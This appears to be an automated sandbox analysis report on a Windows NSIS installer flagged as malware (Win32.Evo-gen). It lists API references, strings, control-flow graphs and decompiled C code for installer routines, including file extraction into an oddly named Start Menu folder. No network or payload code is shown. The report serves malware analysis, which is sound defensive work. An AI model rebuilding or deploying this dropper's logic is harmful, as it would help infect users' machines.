                                                    0x00000000
                                                    0x004030de
                                                    0x0040306c
                                                    0x00403077
                                                    0x0040307c
                                                    0x0040307e
                                                    0x00000000
                                                    0x00000000
                                                    0x00403087
                                                    0x0040308a
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00402f63
                                                    0x00402f63
                                                    0x00402f68
                                                    0x00402f6c
                                                    0x00402f73
                                                    0x00402f78
                                                    0x00402f7a
                                                    0x00402f7c
                                                    0x00402f7c
                                                    0x00402f84
                                                    0x00402f89
                                                    0x00402f8b
                                                    0x004030ea
                                                    0x0040312c
                                                    0x00000000
                                                    0x0040312c
                                                    0x00402f91
                                                    0x00402f97
                                                    0x00403017
                                                    0x0040301b
                                                    0x0040301e
                                                    0x00403023
                                                    0x00000000
                                                    0x0040301b
                                                    0x00402fa4
                                                    0x00402fa9
                                                    0x00402fac
                                                    0x00402fb1
                                                    0x00000000
                                                    0x00000000
                                                    0x00402fb3
                                                    0x00402fba
                                                    0x00000000
                                                    0x00000000
                                                    0x00402fbc
                                                    0x00402fc3
                                                    0x00000000
                                                    0x00000000
                                                    0x00402fc5
                                                    0x00402fcc
                                                    0x00000000
                                                    0x00000000
                                                    0x00402fce
                                                    0x00402fd5
                                                    0x00000000
                                                    0x00000000
                                                    0x00402fd7
                                                    0x00402fdd
                                                    0x00402fe6
                                                    0x00402fec
                                                    0x00402fef
                                                    0x00402ff1
                                                    0x00402ff7
                                                    0x00000000
                                                    0x00000000
                                                    0x00402ffd
                                                    0x00403001
                                                    0x00403009
                                                    0x00403009
                                                    0x0040300c
                                                    0x0040300f
                                                    0x00403011
                                                    0x00403013
                                                    0x00403013
                                                    0x00000000
                                                    0x00403011
                                                    0x00403003
                                                    0x00403007
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00403024
                                                    0x00403024
                                                    0x0040302a
                                                    0x0040303a
                                                    0x0040303a
                                                    0x0040303d
                                                    0x00403043
                                                    0x00403045
                                                    0x00403045
                                                    0x00000000
                                                    0x00402f63

                                                    APIs
                                                    • GetTickCount.KERNEL32 ref: 00402EE9
                                                    • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exe,00000400), ref: 00402F05
                                                      • Part of subcall function 00405DE7: GetFileAttributesW.KERNELBASE(00000003,00402F18,C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exe,80000000,00000003), ref: 00405DEB
                                                      • Part of subcall function 00405DE7: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405E0D
                                                    • GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exe,C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exe,80000000,00000003), ref: 00402F4E
                                                    • GlobalAlloc.KERNELBASE(00000040,0040A230), ref: 00403095
                                                    Strings
                                                    • C:\Users\user\Desktop, xrefs: 00402F30, 00402F35, 00402F3B
                                                    • Inst, xrefs: 00402FBC
                                                    • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 0040312C
                                                    • soft, xrefs: 00402FC5
                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 00402EDF, 004030AD
                                                    • C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exe, xrefs: 00402EEF, 00402EFE, 00402F12, 00402F2F
                                                    • "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exe", xrefs: 00402ED5
                                                    • Error writing temporary file. Make sure your temp folder is valid., xrefs: 004030DE
                                                    • Null, xrefs: 00402FCE
                                                    • Error launching installer, xrefs: 00402F25
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.39668944121.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.39668910636.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669012668.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669057368.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669238341.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669280533.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669312568.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669349693.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669430204.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669464054.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                    • String ID: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                    • API String ID: 2803837635-2494394425
                                                    • Opcode ID: cc8dbefb85167051c5f544e5004306f35bb35ae70e2c75d84afc589ab8111160
                                                    • Instruction ID: 3828440c67d76786f1e0e44594fc16ccb97003feb117245618602a5e37269db8
                                                    • Opcode Fuzzy Hash: cc8dbefb85167051c5f544e5004306f35bb35ae70e2c75d84afc589ab8111160
                                                    • Instruction Fuzzy Hash: 5E61C271A01204ABDB20DF65DD85B9E7BB8EB04355F20417BFA00F62D1CB7C9A458B9D
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00406234 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 207stringCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 946 406234-40623f 947 406241-406250 946->947 948 406252-406268 946->948 947->948 949 406480-406486 948->949 950 40626e-40627b 948->950 952 40648c-406497 949->952 953 40628d-40629a 949->953 950->949 951 406281-406288 950->951 951->949 955 4064a2-4064a3 952->955 956 406499-40649d call 406212 952->956 953->952 954 4062a0-4062ac 953->954 957 4062b2-4062ee 954->957 958 40646d 954->958 956->955 960 4062f4-4062ff GetVersion 957->960 961 40640e-406412 957->961 962 40647b-40647e 958->962 963 40646f-406479 958->963 964 406301-406305 960->964 965 406319 960->965 966 406414-406418 961->966 967 406447-40644b 961->967 962->949 963->949 964->965 970 406307-40630b 964->970 973 406320-406327 965->973 971 406428-406435 call 406212 966->971 972 40641a-406426 call 406159 966->972 968 40645a-40646b lstrlenW 967->968 969 40644d-406455 call 406234 967->969 968->949 969->968 970->965 975 40630d-406311 970->975 984 40643a-406443 971->984 972->984 977 406329-40632b 973->977 978 40632c-40632e 973->978 975->965 980 406313-406317 975->980 977->978 982 406330-40634d call 4060df 978->982 983 40636a-40636d 978->983 980->973 989 406352-406356 982->989 985 40637d-406380 983->985 986 40636f-40637b GetSystemDirectoryW 983->986 984->968 988 406445 984->988 992 406382-406390 GetWindowsDirectoryW 985->992 993 4063eb-4063ed 985->993 991 4063ef-4063f3 986->991 990 406406-40640c call 4064a6 988->990 994 4063f5-4063f9 989->994 995 40635c-406365 call 406234 989->995 990->968 991->990 991->994 992->993 993->991 996 406392-40639c 993->996 994->990 999 4063fb-406401 lstrcatW 994->999 995->991 1001 4063b6-4063cc SHGetSpecialFolderLocation 996->1001 1002 40639e-4063a1 996->1002 999->990 1005 4063e7 1001->1005 1006 4063ce-4063e5 SHGetPathFromIDListW CoTaskMemFree 1001->1006 1002->1001 1004 4063a3-4063aa 1002->1004 1007 4063b2-4063b4 1004->1007 1005->993 1006->991 1006->1005 1007->991 1007->1001
                                                    C-Code - Quality: 74%
                                                    			E00406234(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
				intOrPtr* _v8;
				struct _ITEMIDLIST* _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _t48;
				WCHAR* _t49;
				signed char _t51;
				signed int _t52;
				signed int _t53;
				signed int _t54;
				short _t66;
				short _t67;
				short _t69;
				short _t71;
				void* _t81;
				signed int _t85;
				intOrPtr* _t89;
				signed char _t90;
				void* _t98;
				void* _t108;
				short _t109;
				signed int _t112;
				void* _t113;
				WCHAR* _t114;
				void* _t116;

				_t113 = __esi;
				_t108 = __edi;
				_t81 = __ebx;
				_t48 = _a8;
				if(_t48 < 0) {
					_t48 =  *( *0x42921c - 4 + _t48 * 4);
				}
				_push(_t81);
				_push(_t113);
				_push(_t108);
				_t89 =  *0x42a278 + _t48 * 2;
				_t49 = 0x4281e0;
				_t114 = 0x4281e0;
				if(_a4 >= 0x4281e0 && _a4 - 0x4281e0 >> 1 < 0x800) {
					_t114 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				while(1) {
					_t109 =  *_t89;
					if(_t109 == 0) {
						break;
					}
					__eflags = (_t114 - _t49 & 0xfffffffe) - 0x800;
					if((_t114 - _t49 & 0xfffffffe) >= 0x800) {
						break;
					}
					_t98 = 2;
					_t89 = _t89 + _t98;
					__eflags = _t109 - 4;
					_v8 = _t89;
					if(__eflags >= 0) {
						if(__eflags != 0) {
							 *_t114 = _t109;
							_t114 = _t114 + _t98;
							__eflags = _t114;
						} else {
							 *_t114 =  *_t89;
							_t114 = _t114 + _t98;
							_t89 = _t89 + _t98;
						}
						continue;
					}
					_t51 =  *((intOrPtr*)(_t89 + 1));
					_t90 =  *_t89;
					_v8 = _v8 + 2;
					_t85 = _t90 & 0x000000ff;
					_t52 = _t51 & 0x000000ff;
					_a8 = (_t51 & 0x0000007f) << 0x00000007 | _t90 & 0x0000007f;
					_v16 = _t52;
					_t53 = _t52 | 0x00008000;
					__eflags = _t109 - 2;
					_v24 = _t85;
					_v28 = _t85 | 0x00008000;
					_v20 = _t53;
					if(_t109 != 2) {
						__eflags = _t109 - 3;
						if(_t109 != 3) {
							__eflags = _t109 - 1;
							if(_t109 == 1) {
								__eflags = (_t53 | 0xffffffff) - _a8;
								E00406234(_t85, _t109, _t114, _t114, (_t53 | 0xffffffff) - _a8);
							}
							L42:
							_t54 = lstrlenW(_t114);
							_t89 = _v8;
							_t114 =  &(_t114[_t54]);
							_t49 = 0x4281e0;
							continue;
						}
						__eflags = _a8 - 0x1d;
						if(_a8 != 0x1d) {
							__eflags = L"kernel32::EnumResourceTypesW(i 0,i r1,i 0)" + (_a8 << 0xb);
							E00406212(_t114, L"kernel32::EnumResourceTypesW(i 0,i r1,i 0)" + (_a8 << 0xb));
						} else {
							E00406159(_t114,  *0x42a248);
						}
						__eflags = _a8 + 0xffffffeb - 7;
						if(_a8 + 0xffffffeb < 7) {
							L33:
							E004064A6(_t114);
						}
						goto L42;
					}
					_t112 = 2;
					_t66 = GetVersion();
					__eflags = _t66;
					if(_t66 >= 0) {
						L13:
						_a8 = 1;
						L14:
						__eflags =  *0x42a2c4;
						if( *0x42a2c4 != 0) {
							_t112 = 4;
						}
						__eflags = _t85;
						if(_t85 >= 0) {
							__eflags = _t85 - 0x25;
							if(_t85 != 0x25) {
								__eflags = _t85 - 0x24;
								if(_t85 == 0x24) {
									GetWindowsDirectoryW(_t114, 0x400);
									_t112 = 0;
								}
								while(1) {
									__eflags = _t112;
									if(_t112 == 0) {
										goto L30;
									}
									_t67 =  *0x42a244;
									_t112 = _t112 - 1;
									__eflags = _t67;
									if(_t67 == 0) {
										L26:
										_t69 = SHGetSpecialFolderLocation( *0x42a248,  *(_t116 + _t112 * 4 - 0x18),  &_v12);
										__eflags = _t69;
										if(_t69 != 0) {
											L28:
											 *_t114 =  *_t114 & 0x00000000;
											__eflags =  *_t114;
											continue;
										}
										__imp__SHGetPathFromIDListW(_v12, _t114);
										__imp__CoTaskMemFree(_v12);
										__eflags = _t69;
										if(_t69 != 0) {
											goto L30;
										}
										goto L28;
									}
									__eflags = _a8;
									if(_a8 == 0) {
										goto L26;
									}
									_t71 =  *_t67( *0x42a248,  *(_t116 + _t112 * 4 - 0x18), 0, 0, _t114); // executed
									__eflags = _t71;
									if(_t71 == 0) {
										goto L30;
									}
									goto L26;
								}
								goto L30;
							}
							GetSystemDirectoryW(_t114, 0x400);
							goto L30;
						} else {
							_t87 = _t85 & 0x0000003f;
							E004060DF(0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion",  *0x42a278 + (_t85 & 0x0000003f) * 2, _t114, _t85 & 0x00000040); // executed
							__eflags =  *_t114;
							if( *_t114 != 0) {
								L31:
								__eflags = _v16 - 0x1a;
								if(_v16 == 0x1a) {
									lstrcatW(_t114, L"\\Microsoft\\Internet Explorer\\Quick Launch");
								}
								goto L33;
							}
							E00406234(_t87, _t112, _t114, _t114, _v16);
							L30:
							__eflags =  *_t114;
							if( *_t114 == 0) {
								goto L33;
							}
							goto L31;
						}
					}
					__eflags = _t66 - 0x5a04;
					if(_t66 == 0x5a04) {
						goto L13;
					}
					__eflags = _v16 - 0x23;
					if(_v16 == 0x23) {
						goto L13;
					}
					__eflags = _v16 - 0x2e;
					if(_v16 == 0x2e) {
						goto L13;
					} else {
						_a8 = _a8 & 0x00000000;
						goto L14;
					}
				}
				 *_t114 =  *_t114 & 0x00000000;
				if(_a4 == 0) {
					return _t49;
				}
				return E00406212(_a4, _t49);
			}






























                                                    0x00406234
                                                    0x00406234
                                                    0x00406234
                                                    0x0040623a
                                                    0x0040623f
                                                    0x00406250
                                                    0x00406250
                                                    0x00406258
                                                    0x00406259
                                                    0x0040625a
                                                    0x0040625b
                                                    0x0040625e
                                                    0x00406266
                                                    0x00406268
                                                    0x00406281
                                                    0x00406284
                                                    0x00406284
                                                    0x00406480
                                                    0x00406480
                                                    0x00406486
                                                    0x00000000
                                                    0x00000000
                                                    0x00406294
                                                    0x0040629a
                                                    0x00000000
                                                    0x00000000
                                                    0x004062a2
                                                    0x004062a3
                                                    0x004062a5
                                                    0x004062a9
                                                    0x004062ac
                                                    0x0040646d
                                                    0x0040647b
                                                    0x0040647e
                                                    0x0040647e
                                                    0x0040646f
                                                    0x00406472
                                                    0x00406475
                                                    0x00406477
                                                    0x00406477
                                                    0x00000000
                                                    0x0040646d
                                                    0x004062b2
                                                    0x004062b5
                                                    0x004062c4
                                                    0x004062ca
                                                    0x004062cd
                                                    0x004062d0
                                                    0x004062da
                                                    0x004062df
                                                    0x004062e1
                                                    0x004062e5
                                                    0x004062e8
                                                    0x004062eb
                                                    0x004062ee
                                                    0x0040640e
                                                    0x00406412
                                                    0x00406447
                                                    0x0040644b
                                                    0x00406450
                                                    0x00406455
                                                    0x00406455
                                                    0x0040645a
                                                    0x0040645b
                                                    0x00406460
                                                    0x00406463
                                                    0x00406466
                                                    0x00000000
                                                    0x00406466
                                                    0x00406414
                                                    0x00406418
                                                    0x0040642e
                                                    0x00406435
                                                    0x0040641a
                                                    0x00406421
                                                    0x00406421
                                                    0x00406440
                                                    0x00406443
                                                    0x00406406
                                                    0x00406407
                                                    0x00406407
                                                    0x00000000
                                                    0x00406443
                                                    0x004062f6
                                                    0x004062f7
                                                    0x004062fd
                                                    0x004062ff
                                                    0x00406319
                                                    0x00406319
                                                    0x00406320
                                                    0x00406320
                                                    0x00406327
                                                    0x0040632b
                                                    0x0040632b
                                                    0x0040632c
                                                    0x0040632e
                                                    0x0040636a
                                                    0x0040636d
                                                    0x0040637d
                                                    0x00406380
                                                    0x00406388
                                                    0x0040638e
                                                    0x0040638e
                                                    0x004063eb
                                                    0x004063eb
                                                    0x004063ed
                                                    0x00000000
                                                    0x00000000
                                                    0x00406392
                                                    0x00406399
                                                    0x0040639a
                                                    0x0040639c
                                                    0x004063b6
                                                    0x004063c4
                                                    0x004063ca
                                                    0x004063cc
                                                    0x004063e7
                                                    0x004063e7
                                                    0x004063e7
                                                    0x00000000
                                                    0x004063e7
                                                    0x004063d2
                                                    0x004063dd
                                                    0x004063e3
                                                    0x004063e5
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x004063e5
                                                    0x0040639e
                                                    0x004063a1
                                                    0x00000000
                                                    0x00000000
                                                    0x004063b0
                                                    0x004063b2
                                                    0x004063b4
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x004063b4
                                                    0x00000000
                                                    0x004063eb
                                                    0x00406375
                                                    0x00000000
                                                    0x00406330
                                                    0x00406332
                                                    0x0040634d
                                                    0x00406352
                                                    0x00406356
                                                    0x004063f5
                                                    0x004063f5
                                                    0x004063f9
                                                    0x00406401
                                                    0x00406401
                                                    0x00000000
                                                    0x004063f9
                                                    0x00406360
                                                    0x004063ef
                                                    0x004063ef
                                                    0x004063f3
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x004063f3
                                                    0x0040632e
                                                    0x00406301
                                                    0x00406305
                                                    0x00000000
                                                    0x00000000
                                                    0x00406307
                                                    0x0040630b
                                                    0x00000000
                                                    0x00000000
                                                    0x0040630d
                                                    0x00406311
                                                    0x00000000
                                                    0x00406313
                                                    0x00406313
                                                    0x00000000
                                                    0x00406313
                                                    0x00406311
                                                    0x0040648c
                                                    0x00406497
                                                    0x004064a3
                                                    0x004064a3
                                                    0x00000000

                                                    APIs
                                                    • GetVersion.KERNEL32(00000000,00422708,?,004053A8,00422708,00000000,00000000,00000000), ref: 004062F7
                                                    • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 00406375
                                                    • GetWindowsDirectoryW.KERNEL32(Call,00000400), ref: 00406388
                                                    • SHGetSpecialFolderLocation.SHELL32(?,?), ref: 004063C4
                                                    • SHGetPathFromIDListW.SHELL32(?,Call), ref: 004063D2
                                                    • CoTaskMemFree.OLE32(?), ref: 004063DD
                                                    • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00406401
                                                    • lstrlenW.KERNEL32(Call,00000000,00422708,?,004053A8,00422708,00000000,00000000,00000000), ref: 0040645B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.39668944121.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.39668910636.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669012668.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669057368.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669238341.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669280533.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669312568.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669349693.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669430204.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669464054.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                    • String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch$kernel32::EnumResourceTypesW(i 0,i r1,i 0)
                                                    • API String ID: 900638850-3610614223
                                                    • Opcode ID: 978d560dfc87019ac3657ebba0841bd774ce65c1ae89d16051c02eb976f42344
                                                    • Instruction ID: 8986ea92d4020f82ea273b0cadebf120af401304848ce5cddb84501886c13395
                                                    • Opcode Fuzzy Hash: 978d560dfc87019ac3657ebba0841bd774ce65c1ae89d16051c02eb976f42344
                                                    • Instruction Fuzzy Hash: C661E371A00115EBDB209F24CD40AAE37A5AF50314F52817FE947BA2D0D73D8AA6CB9D
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0040176F Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 145stringtimeCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1272 40176f-401794 call 402c53 call 405c3d 1277 401796-40179c call 406212 1272->1277 1278 40179e-4017b0 call 406212 call 405bc6 lstrcatW 1272->1278 1283 4017b5-4017b6 call 4064a6 1277->1283 1278->1283 1287 4017bb-4017bf 1283->1287 1288 4017c1-4017cb call 406555 1287->1288 1289 4017f2-4017f5 1287->1289 1296 4017dd-4017ef 1288->1296 1297 4017cd-4017db CompareFileTime 1288->1297 1290 4017f7-4017f8 call 405dc2 1289->1290 1291 4017fd-401819 call 405de7 1289->1291 1290->1291 1299 40181b-40181e 1291->1299 1300 40188d-4018b6 call 405371 call 40317b 1291->1300 1296->1289 1297->1296 1301 401820-40185e call 406212 * 2 call 406234 call 406212 call 405957 1299->1301 1302 40186f-401879 call 405371 1299->1302 1312 4018b8-4018bc 1300->1312 1313 4018be-4018ca SetFileTime 1300->1313 1301->1287 1334 401864-401865 1301->1334 1314 401882-401888 1302->1314 1312->1313 1316 4018d0-4018db CloseHandle 1312->1316 1313->1316 1317 402ae4 1314->1317 1320 4018e1-4018e4 1316->1320 1321 402adb-402ade 1316->1321 1322 402ae6-402aea 1317->1322 1324 4018e6-4018f7 call 406234 lstrcatW 1320->1324 1325 4018f9-4018fc call 406234 1320->1325 1321->1317 1331 401901-4022f2 1324->1331 1325->1331 1335 4022f7-4022fc 1331->1335 1336 4022f2 call 405957 1331->1336 1334->1314 1337 401867-401868 1334->1337 1335->1322 1336->1335 1337->1302
                                                    C-Code - Quality: 77%
                                                    			E0040176F(FILETIME* __ebx, void* __eflags) {
				void* __edi;
				void* _t35;
				void* _t43;
				void* _t45;
				FILETIME* _t51;
				FILETIME* _t64;
				void* _t66;
				signed int _t72;
				FILETIME* _t73;
				FILETIME* _t77;
				signed int _t79;
				void* _t81;
				void* _t82;
				WCHAR* _t84;
				void* _t86;

				_t77 = __ebx;
				 *(_t86 - 8) = E00402C53(0x31);
				 *(_t86 + 8) =  *(_t86 - 0x28) & 0x00000007;
				_t35 = E00405C3D( *(_t86 - 8));
				_push( *(_t86 - 8));
				_t84 = L"Call";
				if(_t35 == 0) {
					lstrcatW(E00405BC6(E00406212(_t84, L"C:\\Users\\Arthur\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Stempelpligtig93\\Vatersotiges\\Knoglemarvsundersgelsen\\Armoniac")), ??);
				} else {
					E00406212();
				}
				E004064A6(_t84);
				while(1) {
					__eflags =  *(_t86 + 8) - 3;
					if( *(_t86 + 8) >= 3) {
						_t66 = E00406555(_t84);
						_t79 = 0;
						__eflags = _t66 - _t77;
						if(_t66 != _t77) {
							_t73 = _t66 + 0x14;
							__eflags = _t73;
							_t79 = CompareFileTime(_t73, _t86 - 0x1c);
						}
						asm("sbb eax, eax");
						_t72 =  ~(( *(_t86 + 8) + 0xfffffffd | 0x80000000) & _t79) + 1;
						__eflags = _t72;
						 *(_t86 + 8) = _t72;
					}
					__eflags =  *(_t86 + 8) - _t77;
					if( *(_t86 + 8) == _t77) {
						E00405DC2(_t84);
					}
					__eflags =  *(_t86 + 8) - 1;
					_t43 = E00405DE7(_t84, 0x40000000, (0 |  *(_t86 + 8) != 0x00000001) + 1);
					__eflags = _t43 - 0xffffffff;
					 *(_t86 - 0x30) = _t43;
					if(_t43 != 0xffffffff) {
						break;
					}
					__eflags =  *(_t86 + 8) - _t77;
					if( *(_t86 + 8) != _t77) {
						E00405371(0xffffffe2,  *(_t86 - 8));
						__eflags =  *(_t86 + 8) - 2;
						if(__eflags == 0) {
							 *((intOrPtr*)(_t86 - 4)) = 1;
						}
						L31:
						 *0x42a2c8 =  *0x42a2c8 +  *((intOrPtr*)(_t86 - 4));
						__eflags =  *0x42a2c8;
						goto L32;
					} else {
						E00406212("C:\Users\Arthur\AppData\Local\Temp\nsg51C2.tmp", _t81);
						E00406212(_t81, _t84);
						E00406234(_t77, _t81, _t84, "C:\Users\Arthur\AppData\Local\Temp\nsg51C2.tmp\System.dll",  *((intOrPtr*)(_t86 - 0x14)));
						E00406212(_t81, "C:\Users\Arthur\AppData\Local\Temp\nsg51C2.tmp");
						_t64 = E00405957("C:\Users\Arthur\AppData\Local\Temp\nsg51C2.tmp\System.dll",  *(_t86 - 0x28) >> 3) - 4;
						__eflags = _t64;
						if(_t64 == 0) {
							continue;
						} else {
							__eflags = _t64 == 1;
							if(_t64 == 1) {
								 *0x42a2c8 =  &( *0x42a2c8->dwLowDateTime);
								L32:
								_t51 = 0;
								__eflags = 0;
							} else {
								_push(_t84);
								_push(0xfffffffa);
								E00405371();
								L29:
								_t51 = 0x7fffffff;
							}
						}
					}
					L33:
					return _t51;
				}
				E00405371(0xffffffea,  *(_t86 - 8));
				 *0x42a2f4 =  *0x42a2f4 + 1;
				_t45 = E0040317B(_t79,  *((intOrPtr*)(_t86 - 0x20)),  *(_t86 - 0x30), _t77, _t77); // executed
				 *0x42a2f4 =  *0x42a2f4 - 1;
				__eflags =  *(_t86 - 0x1c) - 0xffffffff;
				_t82 = _t45;
				if( *(_t86 - 0x1c) != 0xffffffff) {
					L22:
					SetFileTime( *(_t86 - 0x30), _t86 - 0x1c, _t77, _t86 - 0x1c); // executed
				} else {
					__eflags =  *((intOrPtr*)(_t86 - 0x18)) - 0xffffffff;
					if( *((intOrPtr*)(_t86 - 0x18)) != 0xffffffff) {
						goto L22;
					}
				}
				CloseHandle( *(_t86 - 0x30)); // executed
				__eflags = _t82 - _t77;
				if(_t82 >= _t77) {
					goto L31;
				} else {
					__eflags = _t82 - 0xfffffffe;
					if(_t82 != 0xfffffffe) {
						E00406234(_t77, _t82, _t84, _t84, 0xffffffee);
					} else {
						E00406234(_t77, _t82, _t84, _t84, 0xffffffe9);
						lstrcatW(_t84,  *(_t86 - 8));
					}
					_push(0x200010);
					_push(_t84);
					E00405957();
					goto L29;
				}
				goto L33;
			}


















                                                    0x0040176f
                                                    0x00401776
                                                    0x00401782
                                                    0x00401785
                                                    0x0040178a
                                                    0x0040178d
                                                    0x00401794
                                                    0x004017b0
                                                    0x00401796
                                                    0x00401797
                                                    0x00401797
                                                    0x004017b6
                                                    0x004017bb
                                                    0x004017bb
                                                    0x004017bf
                                                    0x004017c2
                                                    0x004017c7
                                                    0x004017c9
                                                    0x004017cb
                                                    0x004017d0
                                                    0x004017d0
                                                    0x004017db
                                                    0x004017db
                                                    0x004017ec
                                                    0x004017ee
                                                    0x004017ee
                                                    0x004017ef
                                                    0x004017ef
                                                    0x004017f2
                                                    0x004017f5
                                                    0x004017f8
                                                    0x004017f8
                                                    0x004017ff
                                                    0x0040180e
                                                    0x00401813
                                                    0x00401816
                                                    0x00401819
                                                    0x00000000
                                                    0x00000000
                                                    0x0040181b
                                                    0x0040181e
                                                    0x00401874
                                                    0x00401879
                                                    0x004015b6
                                                    0x004028a1
                                                    0x004028a1
                                                    0x00402adb
                                                    0x00402ade
                                                    0x00402ade
                                                    0x00000000
                                                    0x00401820
                                                    0x00401826
                                                    0x0040182d
                                                    0x0040183a
                                                    0x00401845
                                                    0x0040185b
                                                    0x0040185b
                                                    0x0040185e
                                                    0x00000000
                                                    0x00401864
                                                    0x00401864
                                                    0x00401865
                                                    0x00401882
                                                    0x00402ae4
                                                    0x00402ae4
                                                    0x00402ae4
                                                    0x00401867
                                                    0x00401867
                                                    0x00401868
                                                    0x00401493
                                                    0x004022f7
                                                    0x004022f7
                                                    0x004022f7
                                                    0x00401865
                                                    0x0040185e
                                                    0x00402ae6
                                                    0x00402aea
                                                    0x00402aea
                                                    0x00401892
                                                    0x00401897
                                                    0x004018a5
                                                    0x004018aa
                                                    0x004018b0
                                                    0x004018b4
                                                    0x004018b6
                                                    0x004018be
                                                    0x004018ca
                                                    0x004018b8
                                                    0x004018b8
                                                    0x004018bc
                                                    0x00000000
                                                    0x00000000
                                                    0x004018bc
                                                    0x004018d3
                                                    0x004018d9
                                                    0x004018db
                                                    0x00000000
                                                    0x004018e1
                                                    0x004018e1
                                                    0x004018e4
                                                    0x004018fc
                                                    0x004018e6
                                                    0x004018e9
                                                    0x004018f2
                                                    0x004018f2
                                                    0x00401901
                                                    0x00401906
                                                    0x004022f2
                                                    0x00000000
                                                    0x004022f2
                                                    0x00000000

                                                    APIs
                                                    • lstrcatW.KERNEL32(00000000,00000000), ref: 004017B0
                                                    • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Stempelpligtig93\Vatersotiges\Knoglemarvsundersgelsen\Armoniac,?,?,00000031), ref: 004017D5
                                                      • Part of subcall function 00406212: lstrcpynW.KERNEL32(?,?,00000400,004034F7,00429240,NSIS Error), ref: 0040621F
                                                      • Part of subcall function 00405371: lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EAD,00000000,?), ref: 004053A9
